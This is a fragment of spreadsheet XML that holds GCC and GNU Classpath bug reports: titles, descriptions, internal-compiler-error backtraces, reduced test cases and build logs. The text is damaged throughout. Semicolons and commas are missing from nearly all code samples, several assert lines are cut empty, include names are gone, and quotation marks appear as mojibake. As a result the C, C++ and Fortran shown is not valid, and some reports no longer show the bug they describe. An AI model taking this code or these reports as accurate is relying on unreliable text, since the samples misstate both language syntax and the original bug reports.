	../../gcc/gcc/tree.c:8010
0xfe1af1 inchash::add_expr(tree_node const* inchash::hash&amp; unsigned int)
	../../gcc/gcc/tree.c:8010
0x8a90a6 do_warn_duplicated_branches
	../../gcc/gcc/c-family/c-warn.c:2263
0x8a90a6 do_warn_duplicated_branches_r(tree_node** int* void*)
	../../gcc/gcc/c-family/c-warn.c:2290
0xff8a23 walk_tree_1(tree_node** tree_node* (*)(tree_node** int* void*) void* hash_set &gt;* tree_node* (*)(tree_node** int* tree_node* (*)(tree_node** int* void*) void* hash_set &gt;*))
	../../gcc/gcc/tree.c:11796
0xff85a0 walk_tree_without_duplicates_1(tree_node** tree_node* (*)(tree_node** int* void*) void* tree_node* (*)(tree_node** int* tree_node* (*)(tree_node** int* void*) void* hash_set &gt;*))
	../../gcc/gcc/tree.c:12139
0x86cb42 c_genericize(tree_node*)
	../../gcc/gcc/c-family/c-gimplify.c:129
0x7f3b11 cp_genericize(tree_node*)
	../../gcc/gcc/cp/cp-gimplify.c:1649
0x60ddb2 finish_function(int)
	../../gcc/gcc/cp/decl.c:15703
0x67ac1b instantiate_decl(tree_node* bool bool)
	../../gcc/gcc/cp/pt.c:22858
0x680f8b instantiate_pending_templates(int)
	../../gcc/gcc/cp/pt.c:22955
0x6c4918 c_parse_final_cleanups()
	../../gcc/gcc/cp/decl2.c:4526
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-68782</t>
  </si>
  <si>
    <t>[6 regression] bad reference member formed with constexpr</t>
  </si>
  <si>
    <t>Using 6.0.0 20151208 the last two asserts fire whereas they don't with GCC 5.2.1 (as expected). The issue seems constexpr related as not marking from_value and from_aggr constexpr makes it go away.
Compiled using:
    g++-trunk -std=c++11 main.cpp
-std=c++14 and -std=c++1z result in the same behaviour.
----------------------------------------
#include 
struct holder { int }
constexpr holder from_value(int&amp; value)
{ return { value } }
struct aggr { int i }
constexpr holder from_aggr(aggr&amp; a)
{ return from_value(a.i) }
int main()
{
    aggr a { 42 }
    // these don't fire
    assert( 
    assert( 
    // those do
    assert( 
    assert( 
}
----------------------------------------</t>
  </si>
  <si>
    <t>GCC-36738</t>
  </si>
  <si>
    <t>[4.4 Regression] Yet another bootstrap failure at rev. 137502 on darwin9</t>
  </si>
  <si>
    <t>At revision 137502 bootstrap fails on darwin9 with:
...
gcc  -g -fkeep-inline-functions -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wcast-qual -Wold-style-definition -Wmissing-format-attribute -fno-common  -DHAVE_CONFIG_H -I. -I. -I../../gcc-4.4-work/gcc -I../../gcc-4.4-work/gcc/. -I../../gcc-4.4-work/gcc/../include -I../../gcc-4.4-work/gcc/../libcpp/include -I/sw/include  -I../../gcc-4.4-work/gcc/../libdecnumber -I../../gcc-4.4-work/gcc/../libdecnumber/dpd -I../libdecnumber  \
          -DLOCALEDIR=\/opt/gcc/gcc4.4w/share/locale\ \
          -c ../../gcc-4.4-work/gcc/intl.c -o intl.o
In file included from /usr/include/_wctype.h:63
                 from /usr/include/wchar.h:114
                 from ../../gcc-4.4-work/gcc/intl.c:85:
/usr/include/ctype.h:230: error: syntax error before '{' token
/usr/include/ctype.h:236: error: syntax error before '{' token
/usr/include/ctype.h:248: error: syntax error before '{' token
/usr/include/ctype.h:255: error: syntax error before '{' token
/usr/include/ctype.h:261: error: syntax error before '{' token
/usr/include/ctype.h:267: error: syntax error before '{' token
/usr/include/ctype.h:273: error: syntax error before '{' token
/usr/include/ctype.h:279: error: syntax error before '{' token
/usr/include/ctype.h:285: error: syntax error before '{' token
/usr/include/ctype.h:291: error: syntax error before '{' token
/usr/include/ctype.h:298: error: syntax error before '{' token
/usr/include/ctype.h:310: error: syntax error before '{' token
/usr/include/ctype.h:316: error: syntax error before '{' token
make[3]: *** [intl.o] Error 1
make[2]: *** [all-stage1-gcc] Error 2
make[1]: *** [stage1-bubble] Error 2
make: *** [all] Error 2</t>
  </si>
  <si>
    <t>CLASSPATH-24216</t>
  </si>
  <si>
    <t>AbstractDocument.remove fires incorrect DocumentEvent</t>
  </si>
  <si>
    <t>The remove operation fires a DocumentEvent whose getChange() method returns an ElementChange that has incorrect offset information for the children in getChildrenRemoved().
Run the attached testcase.
**Expected output:
added child from: 0 to: 57
removed child from: 0 to: 5
removed child from: 5 to: 57
**Actual output:
added child from: 0 to: 57
removed child from: 0 to: 6
removed child from: 6 to: 57</t>
  </si>
  <si>
    <t>GCC-56085</t>
  </si>
  <si>
    <t>Unsafe negation in C++03 pow(complexint)</t>
  </si>
  <si>
    <t>template
    inline complex
    pow(const complex&amp; __z int __n)
    {
      return __n &lt; 0
        ? complex(1) / std::__complex_pow_unsigned(__z -__n)
        : std::__complex_pow_unsigned(__z __n)
If I understand correctly -__n is undefined behavior for INT_MIN and this should use -(unsigned)__n instead to be safe. This is not just theoretical other projects had to do similar changes because gcc starting with 4.7 would produce wrong code otherwise.</t>
  </si>
  <si>
    <t>GCC-6444</t>
  </si>
  <si>
    <t>[x86 x fr30-elf] does not build simple test case -- follow-on to #6172</t>
  </si>
  <si>
    <t>$ xgcc -O2 -S div.c
div.c: In function `div':
div.c:11: Internal compiler error in change_address_1 at emit-rtl.c:1784
where the complete contents of div.c is these 11 lines simplified from the stdlib member (no #includes):
---------------------------------------------
typedef struct { int quot int rem } div_t
div_t div (num denom) 
int num
int denom
{
  div_t r
  r.quot = num / denom
  r.rem = num % denom
  return (r)
}
---------------------------------------------
It is perhaps noteworthy that elimination of either division operator in favor of a simple variable access avoids the failure as does replacing both operators with addition.  Also does not fail without -O.
Release:
3.2 20020424 (experimental)
Environment:
Cross from i686-pc-cygwin to fr30-elf
 or from i686-pc-linux-gnu to fr30-elf
How-To-Repeat:
Use  as basic
build description building to fr30-elf.  When build fails add location of xgcc to path and compile div.c as shown.</t>
  </si>
  <si>
    <t>smarks</t>
  </si>
  <si>
    <t>GCC-71518</t>
  </si>
  <si>
    <t>[6 Regression] wrong code at -O3 on x86_64-linux-gnu in 64-bit mode (not in 32-bit mode)</t>
  </si>
  <si>
    <t>The current gcc trunk and 6.1.x miscompile the following code on x86_64-linux-gnu at -O3 in the 64-bit mode (but not in the 32-bit mode).
This is a regression from 5.4.x and goes away with -fno-tree-vectorize. 
$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0612 (experimental) [trunk revision 237336] (GCC) 
$ 
$ gcc-trunk -m32 -O3 small.c ./a.out
$ gcc-trunk -m64 -O2 small.c ./a.out
$ gcc-5.4 -O3 small.c ./a.out
$ 
$ gcc-trunk -m64 -O3 small.c
$ ./a.out
Segmentation fault (core dumped)
$ 
$ gcc-6.1 -m64 -O3 small.c
$ ./a.out
Segmentation fault (core dumped)
$ 
--------------------------------
int a *b[9] c d e 
static int
fn1 ()
{
  for (c = 6 c &gt;= 0 c--)
    for (d = 0 d &lt; 2 d++)
      {
        b[d * 2 + c] = 0
        e = a &gt; 1 ? : 0
        if (e == 2) 
          return 0
      }
  return 0
}
int
main ()
{
  fn1 ()
  return 0 
}</t>
  </si>
  <si>
    <t>GCC-35321</t>
  </si>
  <si>
    <t>[4.3 regression] ICE with invalid use of __builtin_offsetof</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE since GCC 4.0.0:
=========================================
struct A
{
  A operator[] (int)
}
struct B
{
  A a
}
void foo()
{
  __builtin_offsetof(B a[0])
}
=========================================
bug.cc: In function 'void foo()':
bug.cc:13: internal compiler error: in fold_offsetof_1 at c-common.c:6850
Please submit a full bug report [etc.]
Before the code was rejected as __builtin_offsetof was not yet supported.
The problem is related to PR28573.</t>
  </si>
  <si>
    <t>GCC-66945</t>
  </si>
  <si>
    <t>ICE in generic_simplify (generic-match.c:24790)</t>
  </si>
  <si>
    <t>Hello !
This very pathological testcase seems to trigger an ICE with a freshly built gcc.
$ xgcc --version
gcc (GCC) 6.0.0 20150720 (experimental)
$ cat tested.c
unsigned b
f()
{
    for()
        if(!b?:(b=0))
        else if(b%0&lt;b?:b)
            for()
}
$ xgcc -w -O1 tested.c
~/experiments/gcc/dist/bin/gcc -w -O1 tested.c
tested.c: In function â€˜fâ€™:
tested.c:2:1: internal compiler error: Segmentation fault
 f()
 ^
0xb7bd2f crash_signal
	../../srcdir/gcc/toplev.c:352
0x91332d generic_simplify(unsigned int tree_code tree_node* tree_node* tree_node*)
	/home/antoine/gcc/objdir/gcc/generic-match.c:24790
0x826037 fold_binary_loc(unsigned int tree_code tree_node* tree_node* tree_node*)
	../../srcdir/gcc/fold-const.c:9190
0xbc2eed cleanup_control_expr_graph
	../../srcdir/gcc/tree-cfgcleanup.c:116
0xbc2eed cleanup_control_flow_bb
	../../srcdir/gcc/tree-cfgcleanup.c:211
0xbc2eed cleanup_tree_cfg_bb
	../../srcdir/gcc/tree-cfgcleanup.c:628
0xbc3548 cleanup_tree_cfg_1
	../../srcdir/gcc/tree-cfgcleanup.c:681
0xbc3548 cleanup_tree_cfg_noloop
	../../srcdir/gcc/tree-cfgcleanup.c:733
0xbc3548 cleanup_tree_cfg()
	../../srcdir/gcc/tree-cfgcleanup.c:788
0xab7e44 execute_function_todo
	../../srcdir/gcc/passes.c:1900
0xab8733 execute_todo
	../../srcdir/gcc/passes.c:2005
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-5152</t>
  </si>
  <si>
    <t>Very recent Optimization bug (compiler segfault)</t>
  </si>
  <si>
    <t>This is a modified extract from Rhino. It compiles without
optimization but segfault with -O2.
This code compiles fine with my previous compiler:
 gcc version 3.1 20011211 (experimental) so the bug appears
in between 11 and 17 of december.
tournesol:~/ws/gcj-bugs/test2$ gcj -O2 -o A.o -c A.java
A.java: In class `A':
A.java: In method `A.interpret(int)':
A.java:26: internal error: Segmentation fault
Please submit a full bug report
Release:
gcc version 3.1 20011217 (experimental)
Environment:
Reading specs from /usr/local/gcc/lib/gcc-lib/i686-pc-linux-gnu/3.1/specs
Reading specs from /usr/local/gcc/lib/gcc-lib/i686-pc-linux-gnu/3.1/../../../libgcj.spec
rename spec lib to liborig
Configured with: ../../program/cvs/gcc/configure --prefix=/usr/local/gcc --enable-shared --enable-threads=posix --enable-languages=c++java
Thread model: posix
How-To-Repeat:
gcj -O2 -o A.o -c A.java</t>
  </si>
  <si>
    <t>GCC-71574</t>
  </si>
  <si>
    <t>ICE on code with alloc_align attribute on x86_64-linux-gnu: in default_conversion at c/c-typeck.c:2126</t>
  </si>
  <si>
    <t>The following code causes an ICE when compiled with the current gcc trunk on x86_64-linux-gnu in both 32-bit and 64-bit modes.
It ICEs all GCC versions 5.x and later. 
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/7.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 7.0.0 20160617 (experimental) [trunk revision 237557] (GCC) 
$ 
$ gcc-trunk -c small.c
small.c:2:1: internal compiler error: in default_conversion at c/c-typeck.c:2118
 int fn2 () __attribute__ ((alloc_align (fn1)))
 ^~~
0x66b0dd default_conversion(tree_node*)
        ../../gcc-source-trunk/gcc/c/c-typeck.c:2118
0x6d4cf0 handle_alloc_align_attribute
        ../../gcc-source-trunk/gcc/c-family/c-common.c:8365
0x641441 decl_attributes(tree_node** tree_node* int)
        ../../gcc-source-trunk/gcc/attribs.c:551
0x65991a start_decl(c_declarator* c_declspecs* bool tree_node*)
        ../../gcc-source-trunk/gcc/c/c-decl.c:4545
0x6bdff5 c_parser_declaration_or_fndef
        ../../gcc-source-trunk/gcc/c/c-parser.c:1963
0x6c7f95 c_parser_external_declaration
        ../../gcc-source-trunk/gcc/c/c-parser.c:1549
0x6c8829 c_parser_translation_unit
        ../../gcc-source-trunk/gcc/c/c-parser.c:1430
0x6c8829 c_parse_file()
        ../../gcc-source-trunk/gcc/c/c-parser.c:17930
0x72b1b2 c_common_parse_file()
        ../../gcc-source-trunk/gcc/c-family/c-opts.c:1070
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
-------------------------------------------------
int fn1 ()
int fn2 () __attribute__ ((alloc_align (fn1)))</t>
  </si>
  <si>
    <t>GCC-8769</t>
  </si>
  <si>
    <t>Compile chokes on mpeglib_artsplay of kdemultimedia (compiler error at extract_insn)</t>
  </si>
  <si>
    <t>The compiler fails with options:
/bin/sh ../libtool --silent --mode=compile --tag=CXX i686-pc-linux-gnu-g++ -DHAVE_CONFIG_H -I. -I. -I.. -I../mpeglib/lib -I/usr/kde/cvs/include/artsc -I/usr/kde/cvs/include/artsc/../arts -I/usr/kde/cvs/include -I/usr/qt/3/include -I/usr/X11R6/include   -DQT_THREAD_SUPPORT  -D_REENTRANT  -Wnon-virtual-dtor -Wno-long-long -Wundef -Wall -pedantic -W -Wpointer-arith -Wmissing-prototypes -Wwrite-strings -ansi -D_XOPEN_SOURCE=500 -D_BSD_SOURCE -Wcast-align -Wconversion -DNDEBUG -DNO_DEBUG -O2 -march=athlon -O2 -pipe -fforce-addr -funroll-loops -frerun-cse-after-loop -frerun-loop-opt -falign-functions=4 -fno-exceptions -fno-check-new -DQT_CLEAN_NAMESPACE -DQT_NO_ASCII_CAST  -c -o decoderBaseObject_impl.lo `test -f decoderBaseObject_impl.cpp || echo './'`decoderBaseObject_impl.cpp
The messages it spit are:
decoderBaseObject_impl.cpp: In member function `int
   DecoderBaseObject_impl::fillArts(long unsigned int float* float*)':
decoderBaseObject_impl.cpp:453: unrecognizable insn:
(insn 994 886 996 (set (reg:SI 275)
        (ashift:SI (reg/v:SI 63)
            (const_int 3 [0x3]))) -1 (nil)
    (nil))
decoderBaseObject_impl.cpp:453: Internal compiler error in extract_insn at
   recog.c:2148
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[1]: *** [decoderBaseObject_impl.lo] Error 1
My gcc -v gives:
Reading specs from /usr/lib/gcc-lib/i686-pc-linux-gnu/3.2/specs
Configured with: /var/tmp/portage/gcc-3.2-r1/work/gcc-3.2/configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --host=i686-pc-linux-gnu --build=i686-pc-linux-gnu --target=i686-pc-linux-gnu --with-system-zlib --enable-languages=cc++adaf77objcjava --enable-threads=posix --enable-long-long --disable-checking --enable-cstdio=stdio --enable-clocale=generic --enable-__cxa_atexit --enable-version-specific-runtime-libs --with-gxx-include-dir=/usr/include/g++-v32 --with-local-prefix=/usr/local --enable-shared --enable-nls --without-included-gettext
Thread model: posix
gcc version 3.2
Release:
3.2
Environment:
AMD Duron running Gentoo Linux 1.4_rc1
How-To-Repeat:
The following comand also works to trigger the error (further reductions of the command line didn't trigger it anymore):
g++ -O2 -fforce-addr -funroll-loops -c -o decoderBaseObject_impl.lo ./decoderBaseObject_impl.ii</t>
  </si>
  <si>
    <t>ismore</t>
  </si>
  <si>
    <t>GCC-9697</t>
  </si>
  <si>
    <t>[3.4 regression] m68020 assembly emitted for m68000</t>
  </si>
  <si>
    <t>I've attached the complete output of the error. I'm compiling newlib-1.11.0 gcc-3.2.2 and binutils 2.13.2.1 on cygwin for the m68k-elf architecture.
I've attached the complete output of the error but to summarize:
 I'm unable to build libiberty/regex.c. The error is an invalid instruction for this architecture: needs 68020 ...
Release:
unknown
Environment:
I'm building the the m68k-elf cross compiler on cygwin.
How-To-Repeat:
-mkdir -p ${BUILD_DIR_NAME}/gcc
	cd ${BUILD_DIR_NAME}/gcc ../../../${GCC_TOOL}/configure \
		--target=${TARGET} --prefix=${PREFIX} \
		--enable-languages=cc++ --with-included-gettext --enable-shared \
		--enable-threads --with-newlib -v</t>
  </si>
  <si>
    <t>mark_lee_hamilton</t>
  </si>
  <si>
    <t>GCC-684</t>
  </si>
  <si>
    <t>Cannot build egcs-20001016 using gcc2.95-2.</t>
  </si>
  <si>
    <t>I wanted to use the -march=athlon flag to compile some code so I downloaded 
the latest snapshot (egcs-20001016). But while trying the build the compiler I 
encountered the following error (last part of log file listed):
.
.
stage1/xgcc -Bstage1/ -B/usr/i686-pc-linux-gnu/bin/ -c  -DIN_GCC    -O2 -g -O2 -W -Wall -Wtraditional -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -pedantic -Wno-long-long  -DHAVE_CONFIG_H    -I. -I. -I./config -I./../include mkdeps.c
rm -rf libcpp.a
ar rc libcpp.a cpplib.o cpplex.o cppmacro.o cppexp.o cppfiles.o cpphash.o cpperror.o cppinit.o cppdefault.o cppoutput.o mkdeps.o prefix.o version.o mbchar.o 
if [ -f ranlib ] || [ -f /usr/bin/ranlib -o -f /bin/ranlib ]  then ranlib libcpp.a  else true  fi
stage1/xgcc -Bstage1/ -B/usr/i686-pc-linux-gnu/bin/  -DIN_GCC    -O2 -g -O2 -W -Wall -Wtraditional -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -pedantic -Wno-long-long  -DHAVE_CONFIG_H  -o cpp0 cppmain.o \
intl.o libcpp.a obstack.o        ../libiberty/libiberty.a
./xgcc -B./ -B/usr/i686-pc-linux-gnu/bin/ -isystem /usr/i686-pc-linux-gnu/include -dumpspecs &gt; tmp-specs
mv tmp-specs specs
echo int xxy_us_dummy &gt;tmp-dum.c
./xgcc -B./ -B/usr/i686-pc-linux-gnu/bin/ -isystem /usr/i686-pc-linux-gnu/include -S tmp-dum.c
cc1: Internal error: Segmentation fault.
   Please submit a full bug report.
   See  for instructions.
make[2]: *** [s-under] Error 1
make[2]: Leaving directory `/clairaut/data40/simon/egcs/egcs-20001016/gcc'
make[1]: *** [stage_c] Error 2
make[1]: Leaving directory `/clairaut/data40/simon/egcs/egcs-20001016/gcc'
make: *** [bootstrap] Error 2
The entire configure and build log-file is attached for your viewing pleasure.
--Simon
Release:
egcs-20001016
Environment:
i686-pc-linux-gnu
Reading specs from /usr/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/specs
gcc version 2.95.2 19991024 (release)
How-To-Repeat:
make bootstrap</t>
  </si>
  <si>
    <t>GCC-5330</t>
  </si>
  <si>
    <t>-Wcast-qual and casting pointers to static functions</t>
  </si>
  <si>
    <t>The -Wcast-qual switch does not interact well with casting a static
function as it is not possible to have the cast do anything but
discard the TYPE_QUAL_CONST qualifier. If both the in_type and
in_otype reduce to FUNCTION_TYPE nodes it should be safe to ignore
the TYPE_QUAL_CONST qualifier.
In the test case below the workaround is to either remove the
'static' attribute from the null_foo function or to avoid using
the -Wcast-qual switch and use -Wno-cast-qual instead.
The patch given in the '&gt;Fix' below seems to work around the problem.
Release:
3.0.3
Environment:
System: FreeBSD mdb-bsd.juniper.net 4.2-STABLE FreeBSD 4.2-STABLE #0: Wed Jan 17 12:03:49 PST 2001 root@mdb-bsd.juniper.net:/usr/obj/usr/src/sys/GENERIC i386
host: i386-unknown-freebsd4.2
build: i386-unknown-freebsd4.2
target: i386-unknown-freebsd4.2
configured with: ../gcc-3.0.3/configure --prefix=/usr/home/mdb/gnu
How-To-Repeat:
% cat cast-qual.c
typedef int (*baz_t) (int)
typedef struct baz_desc { int num baz_t deflt } baz_desc_t
static int null_foo (int myarg) { return 0 }
baz_desc_t fooa_desc = { 0 null_foo }
baz_desc_t foob_desc = { 0 (baz_t) null_foo }
EOF
% gcc -c -O -g -Werror -Wcast-qual cast-qual.c
cc1: warnings being treated as errors
cast-qual.c:5: warning: cast discards qualifiers from pointer target type
%</t>
  </si>
  <si>
    <t>mdb</t>
  </si>
  <si>
    <t>GCC-56642</t>
  </si>
  <si>
    <t>ice in backtrace_dwarf_add</t>
  </si>
  <si>
    <t>I just tried to compile the package qtwebkit-2.3-0.6.rc1.fc19
on gcc-4.9 trunk dated 20130317 on an AMD x86_64 box.
The compiler said
BUILD/webkit-qtwebkit-23/Source/WTF/wtf/PassRefPtr.h:160:47: internal compiler error: Segmentation fault
     template inline PassRefPtr adoptRef(T* p)
                                               ^
Running under valgrind gives
==6025==
==6025== Process terminating with default action of signal 11 (SIGSEGV)
==6025==  General Protection Fault
==6025==    at 0x1154DA3: backtrace_dwarf_add (dwarf.c:1438)
==6025==    by 0x114EE70: backtrace_initialize (elf.c:757)
==6025==    by 0x114D5FB: backtrace_pcinfo (fileline.c:144)
==6025==    by 0x114CECF: unwind (backtrace.c:83)
Preprocessed source code attached. No special flags required.</t>
  </si>
  <si>
    <t>GCC-48624</t>
  </si>
  <si>
    <t>gfortran DECL issues in function declaration</t>
  </si>
  <si>
    <t>Split off from 48286. Richard writes there:
Btw fndecl issue - if you build at least cray_pointers_8.f90 with
-fwhole-program
I get
/tmp/ccBnfOGf.o: In function `main':
cray_pointers_8.f90:(.text.startup+0x76): undefined reference to `euler_'
collect2: ld returned 1 exit status
which means the euler fn has a different decl than the one called from main.
I can reproduce this with:
  gfortran -fcray-pointer -O2 -fwhole-program cray_pointers_8.f90</t>
  </si>
  <si>
    <t>GCC-35578</t>
  </si>
  <si>
    <t>[4.2/4.3 Regression] Error about misplaced 'friend' word is issued on a wrong line</t>
  </si>
  <si>
    <t>When I compile the code below I get:
x.C:3: error: 'friend' used outside of class
And 'friend' word is on the line #5.
=== code begins ===
int i() {
  return (0)
} /*here an error is reported*/
friend void x() {
}</t>
  </si>
  <si>
    <t>GCC-40948</t>
  </si>
  <si>
    <t>ICE in lower_stmt at gimple-low.c:408</t>
  </si>
  <si>
    <t>testclass.cpp: In constructor TestClass::TestClass():
testclass.cpp:13: internal compiler error: in lower_stmt at gimple-low.c:408
Please tell me if you need more information.
The error vanishes if the definition of TestClass::TestClass() is moved into the declaration of TestClass.
Version: gcc (Gentoo 4.4.1 p1.0) 4.4.1</t>
  </si>
  <si>
    <t>GCC-26985</t>
  </si>
  <si>
    <t>incorrect matmul result</t>
  </si>
  <si>
    <t>$ cat fail.f90 
  implicit none
  real(8) :: a(29) b(97) c(27)
  integer :: i j
  a = 0.d0
  b = 0.d0
  c = 1789789.d0
  c(:1:7:2) = matmul(ab(:1:7:2))
  do i = 1 7
    print * c(:i)
  end do
  end
$ ifort fail.f90 &amp;&amp; ./a.out   
  0.000000000000000E+000  0.000000000000000E+000
   1789789.00000000        1789789.00000000     
  0.000000000000000E+000  0.000000000000000E+000
   1789789.00000000        1789789.00000000     
  0.000000000000000E+000  0.000000000000000E+000
   1789789.00000000        1789789.00000000     
  0.000000000000000E+000  0.000000000000000E+000
$ gfortran fail.f90 &amp;&amp; ./a.out
   0.00000000000000        0.00000000000000     
   0.00000000000000        0.00000000000000     
   0.00000000000000        0.00000000000000     
   0.00000000000000        0.00000000000000     
   1789789.00000000        1789789.00000000     
   1789789.00000000        1789789.00000000     
   1789789.00000000        1789789.00000000</t>
  </si>
  <si>
    <t>GCC-38421</t>
  </si>
  <si>
    <t>libstdc++-v3/include/tr1/ell_integral.tcc contains __ea identifier</t>
  </si>
  <si>
    <t>The SPU port is adding support for named address spaces and will be adding the __ea keyword as a type qualifier.  At the moment the named address support is for C only but at some point in the future it might be desirable to add named address support to C++ as well.  If C++ support is added then the libstdc++-v3/include/tr1/ell_integral.tcc file needs to be changed to not use the __ea identifier.</t>
  </si>
  <si>
    <t>GCC-78447</t>
  </si>
  <si>
    <t>[7 Regression] wrong code when combine changes shifts by &gt; 15 to &gt;&gt; 10 at -O</t>
  </si>
  <si>
    <t>Created attachment 40099
reduced testcase
Output:
$ x86_64-pc-linux-gnu-gcc -O testcase.c
$ ./a.out
Aborted
$ x86_64-pc-linux-gnu-gcc -v           
Using built-in specs.
COLLECT_GCC=/repo/gcc-trunk/binary-latest/bin/x86_64-pc-linux-gnu-gcc
COLLECT_LTO_WRAPPER=/repo/gcc-trunk/binary-trunk-242583-checking-yes-rtl-df-extra-nobootstrap-nographite-amd64/bin/../libexec/gcc/x86_64-pc-linux-gnu/7.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /repo/gcc-trunk//configure --enable-languages=cc++ --enable-valgrind-annotations --disable-nls --enable-checking=yesrtldfextra --disable-bootstrap --without-cloog --without-ppl --without-isl --build=x86_64-pc-linux-gnu --host=x86_64-pc-linux-gnu --target=x86_64-pc-linux-gnu --with-ld=/usr/bin/x86_64-pc-linux-gnu-ld --with-as=/usr/bin/x86_64-pc-linux-gnu-as --disable-libstdcxx-pch --prefix=/repo/gcc-trunk//binary-trunk-242583-checking-yes-rtl-df-extra-nobootstrap-nographite-amd64
Thread model: posix
gcc version 7.0.0 20161118 (experimental) (GCC) 
Before .combine:
...
(insn 9 8 10 2 (parallel [
            (set (reg:SI 108)
                (ashift:SI (reg/v:SI 105 [ xD.1799 ])
                    (const_int 5 [0x5])))
            (clobber (reg:CC 17 flags))
        ]) testcase.c:13 529 {*ashlsi3_1}
     (expr_list:REG_DEAD (reg/v:SI 105 [ xD.1799 ])
        (expr_list:REG_UNUSED (reg:CC 17 flags)
            (nil))))
...
(insn 11 10 12 2 (parallel [
            (set (reg:HI 110)
                (lshiftrt:HI (subreg:HI (reg:SI 109) 0)
                    (const_int 15 [0xf])))
            (clobber (reg:CC 17 flags))
        ]) testcase.c:15 572 {*lshrhi3_1}
     (expr_list:REG_DEAD (reg:SI 109)
        (expr_list:REG_UNUSED (reg:CC 17 flags)
            (nil))))
(insn 12 11 13 2 (set (reg:QI 92 [ _11 ])
        (subreg:QI (reg:HI 110) 0)) testcase.c:15 85 {*movqi_internal}
     (expr_list:REG_DEAD (reg:HI 110)
        (nil)))
...
.combine shows:
...
Trying 9 11 -&gt; 12:
...
Successfully matched this instruction:
(set (reg:SI 110)
    (lshiftrt:SI (reg/v:SI 105 [ xD.1799 ])
        (const_int 10 [0xa])))
Successfully matched this instruction:
(set (subreg:SI (reg:QI 92 [ _11 ]) 0)
    (and:SI (reg:SI 110)
        (const_int 255 [0xff])))
allowing combination of insns 9 11 and 12
original costs 4 + 4 + 4 = 12
replacement costs 4 + 4 = 8
Which is probably wrong.
Tested revisions:
r242657 - FAIL
r242583 - FAIL
r242510 - FAIL
r242408 - OK</t>
  </si>
  <si>
    <t>GCC-68318</t>
  </si>
  <si>
    <t>ICE on duplicate entry declarations</t>
  </si>
  <si>
    <t>With duplicate entry declarations in scope :
$ cat z1.f90
module m
   implicit none
contains
   subroutine s1
   entry e
   end
   subroutine s2
   entry e
   end
end module
$ gfortran -g -O0 -Wall -fcheck=all -c z1.f90
z1.f90:8.10:
   entry e
          1
z1.f90:5.10:
   entry e
          2
Error: Procedure 'e' at (1) is already defined at (2)
f951: internal compiler error: in gfc_release_symbol at fortran/symbol.c:2591
---
$ cat z7.f90
module m1
   implicit none
contains
   subroutine s1
   entry e
   end
end module
module m2
   use m1
   implicit none
contains
   subroutine s2
   entry e
   end
end module
$ gfortran -g -O0 -Wall -fcheck=all -c z7.f90
z7.f90:14.10:
   entry e
          1
z7.f90:10.7:
   use m1
       2
Error: Procedure 'e' at (1) is already defined at (2)
f951: internal compiler error: in gfc_release_symbol at fortran/symbol.c:2591</t>
  </si>
  <si>
    <t>GCC-71238</t>
  </si>
  <si>
    <t>Undeclared function message imprecisely points to error column</t>
  </si>
  <si>
    <t>The following program
int main()
{
    int x=myFunc(3234)
}
gives me the error:
test.cpp:3:22: error: â€˜myFuncâ€™ was not declared in this scope
     int x=myFunc(3234)
                      ^
Here the ^ symbol points to the closing parenthesis (and the parenthesis itself is even colored red). But the error is not at that column but rather at `myFunc` identifier.
Similar code but without function call parentheses leads to much more precise error message:
test.cpp:3:11: error: â€˜myFuncâ€™ was not declared in this scope
     int x=myFunc/*(3234)*/
           ^~~~~~</t>
  </si>
  <si>
    <t>GCC-38334</t>
  </si>
  <si>
    <t>pmf accesses violate strict-aliasing rules</t>
  </si>
  <si>
    <t>For g++.dg/opt/pmf1.C we generate
  struct Container t
...
:
  D.1857_10 = (int (*__vtbl_ptr_type) (void) * *) 
  D.1858_11 = *D.1857_10
a strict-aliasing warning is created if SRA is enabled and PR36509 is fixed.
The frontend should probably use a ref-all pointer for the access.</t>
  </si>
  <si>
    <t>GCC-21943</t>
  </si>
  <si>
    <t>O32 libffi.so fails to link on IRIX 6</t>
  </si>
  <si>
    <t xml:space="preserve">
Building the O32 libffi on IRIX 6.5 fails thus we get a bootstrap failure
with --enable-libgcj:
/bin/ksh ./libtool --mode=link /.vol/gcc/obj/gcc-4.0.0-20050414/6.5-gcc-java/gcc/xgcc -B/.vol/gcc/obj/gcc-4.0.0-20050414/6.5-gcc-java/gcc/ -B/.vol/gcc/share/mips-sgi-irix6.5/bin/ -B/.vol/gcc/share/mips-sgi-irix6.5/lib/ -isystem /.vol/gcc/share/mips-sgi-irix6.5/include -isystem /.vol/gcc/share/mips-sgi-irix6.5/sys-include  -mabi=32 -Wall -g -fexceptions -O2 -g -O2  -mabi=32  -mabi=32 -o libffi.la -rpath /.vol/gcc/lib/../lib -version-info `grep -v '^#' /.vol/gcc/src/gcc-4.0-branch-dist/libffi/libtool-version` src/debug.lo src/prep_cif.lo src/types.lo src/raw_api.lo src/java_raw_api.lo src/mips/ffi.lo src/mips/o32.lo src/mips/n32.lo                    
